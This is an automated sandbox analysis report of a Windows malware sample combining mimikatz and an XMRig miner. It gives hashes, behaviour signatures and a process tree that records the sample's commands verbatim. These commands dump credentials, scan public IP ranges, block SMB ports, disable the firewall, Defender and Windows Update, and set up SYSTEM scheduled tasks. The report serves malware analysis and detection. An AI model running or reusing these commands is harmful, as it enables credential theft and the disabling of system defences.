Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-11-2024 11:13

General

  • Target

    2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe

  • Size

    17.5MB

  • MD5

    f92ab9f95fc7af060e030eba3740eb5a

  • SHA1

    91c0ec0bb6ad3a3f1b2ad772c40b260b1cf7ccfd

  • SHA256

    e5f7b32c9a7280103d6cbf3c2d3b43ecb761ccb9021b6975fef5945f8275b8bf

  • SHA512

    5561587b2ce00ff2271fd23e3c2fc64d2492db5dd3f38e778ccc9d24fcac89c1c0500000cdc7a3a106354e67b06236aef41ca3ff5f4738408f0862843ac28d8b

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYPHlTPemknGzwHdOgEPHd9BYX/nivPl/:a3jz0E52/iv1E3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (19477) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 10 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 35 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2092
      • C:\Windows\TEMP\lntjubmbe\ttlnnh.exe
        "C:\Windows\TEMP\lntjubmbe\ttlnnh.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4500
    • C:\Users\Admin\AppData\Local\Temp\2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:740
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tllefmnq\yittybr.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:4016
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3412
        • C:\Windows\tllefmnq\yittybr.exe
          C:\Windows\tllefmnq\yittybr.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2284
    • C:\Windows\tllefmnq\yittybr.exe
      C:\Windows\tllefmnq\yittybr.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4592
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1148
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2396
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4880
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4480
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1616
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
              PID:4612
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4244
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2996
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:4908
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:3012
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4616
            • C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe
              C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2180
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4052
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                    PID:2576
                • C:\Windows\SysWOW64\net.exe
                  net stop "TrueSight Meter"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2448
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "TrueSight Meter"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4724
                • C:\Windows\SysWOW64\net.exe
                  net stop npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2876
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1080
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2964
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:3156
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
                PID:3756
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4016
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:4544
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                  PID:2356
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2888
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:4612
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1148
                  • C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe
                    C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1816
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ppgkyibiq\Corporate\log.txt
                  2⤵
                  • Drops file in Windows directory
                  PID:2952
                  • C:\Windows\ppgkyibiq\Corporate\vfshost.exe
                    C:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2792
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2200
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:3236
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:2220
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2248
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4816
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:4456
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "blhbujgqb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3140
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:3444
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "blhbujgqb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:4648
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1424
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1876
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4112
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3336
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2448
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1724
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1296
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:4192
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4652
                • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 780 C:\Windows\TEMP\ppgkyibiq\780.dmp
                  2⤵
                  • Executes dropped EXE
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1432
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4016
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2140
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3508
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop SharedAccess
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:4612
                  • C:\Windows\SysWOW64\net.exe
                    net stop SharedAccess
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2288
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop SharedAccess
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:2540
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c netsh firewall set opmode mode=disable
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:4860
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh firewall set opmode mode=disable
                    3⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:872
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c netsh Advfirewall set allprofiles state off
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:5088
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh Advfirewall set allprofiles state off
                    3⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:2000
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop MpsSvc
                  2⤵
                    PID:4200
                    • C:\Windows\SysWOW64\net.exe
                      net stop MpsSvc
                      3⤵
                        PID:2248
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop MpsSvc
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:2672
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop WinDefend
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:4540
                      • C:\Windows\SysWOW64\net.exe
                        net stop WinDefend
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:3276
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop WinDefend
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:220
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop wuauserv
                      2⤵
                        PID:3004
                        • C:\Windows\SysWOW64\net.exe
                          net stop wuauserv
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1444
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop wuauserv
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:1964
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config MpsSvc start= disabled
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2164
                        • C:\Windows\SysWOW64\sc.exe
                          sc config MpsSvc start= disabled
                          3⤵
                          • Launches sc.exe
                          • System Location Discovery: System Language Discovery
                          PID:4384
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config SharedAccess start= disabled
                        2⤵
                          PID:1832
                          • C:\Windows\SysWOW64\sc.exe
                            sc config SharedAccess start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:3972
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config WinDefend start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4600
                          • C:\Windows\SysWOW64\sc.exe
                            sc config WinDefend start= disabled
                            3⤵
                            • Launches sc.exe
                            PID:3892
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config wuauserv start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:2392
                          • C:\Windows\SysWOW64\sc.exe
                            sc config wuauserv start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:4876
                        • C:\Windows\TEMP\xohudmc.exe
                          C:\Windows\TEMP\xohudmc.exe
                          2⤵
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of SetWindowsHookEx
                          PID:3852
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 384 C:\Windows\TEMP\ppgkyibiq\384.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2492
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2092 C:\Windows\TEMP\ppgkyibiq\2092.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2984
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2500 C:\Windows\TEMP\ppgkyibiq\2500.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2108
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2892 C:\Windows\TEMP\ppgkyibiq\2892.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1836
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2724 C:\Windows\TEMP\ppgkyibiq\2724.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3616
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3168 C:\Windows\TEMP\ppgkyibiq\3168.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:540
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3744 C:\Windows\TEMP\ppgkyibiq\3744.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4316
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3860 C:\Windows\TEMP\ppgkyibiq\3860.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2680
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3956 C:\Windows\TEMP\ppgkyibiq\3956.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:816
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 4056 C:\Windows\TEMP\ppgkyibiq\4056.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2792
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 752 C:\Windows\TEMP\ppgkyibiq\752.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4320
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 5072 C:\Windows\TEMP\ppgkyibiq\5072.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4008
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3976 C:\Windows\TEMP\ppgkyibiq\3976.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3280
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 372 C:\Windows\TEMP\ppgkyibiq\372.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2848
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3208 C:\Windows\TEMP\ppgkyibiq\3208.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4492
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 1532 C:\Windows\TEMP\ppgkyibiq\1532.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1004
                        • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                          C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 5000 C:\Windows\TEMP\ppgkyibiq\5000.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4824
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c C:\Windows\ppgkyibiq\ihnqsqiep\scan.bat
                          2⤵
                            PID:3252
                            • C:\Windows\ppgkyibiq\ihnqsqiep\vmlbqggye.exe
                              vmlbqggye.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                              3⤵
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              PID:4276
                        • C:\Windows\SysWOW64\luprqy.exe
                          C:\Windows\SysWOW64\luprqy.exe
                          1⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of SetWindowsHookEx
                          PID:180
                        • C:\Windows\system32\cmd.EXE
                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
                          1⤵
                            PID:2736
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              2⤵
                                PID:4880
                              • C:\Windows\system32\cacls.exe
                                cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
                                2⤵
                                  PID:1376
                              • C:\Windows\system32\cmd.EXE
                                C:\Windows\system32\cmd.EXE /c C:\Windows\ime\yittybr.exe
                                1⤵
                                  PID:2396
                                  • C:\Windows\ime\yittybr.exe
                                    C:\Windows\ime\yittybr.exe
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:3904
                                • C:\Windows\system32\cmd.EXE
                                  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
                                  1⤵
                                    PID:4660
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      2⤵
                                        PID:1052
                                      • C:\Windows\system32\cacls.exe
                                        cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
                                        2⤵
                                          PID:1148
                                      • C:\Windows\system32\cmd.EXE
                                        C:\Windows\system32\cmd.EXE /c C:\Windows\ime\yittybr.exe
                                        1⤵
                                          PID:3448
                                          • C:\Windows\ime\yittybr.exe
                                            C:\Windows\ime\yittybr.exe
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetWindowsHookEx
                                            PID:4472
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
                                          1⤵
                                            PID:4908
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              2⤵
                                                PID:5508
                                              • C:\Windows\system32\cacls.exe
                                                cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
                                                2⤵
                                                  PID:5256
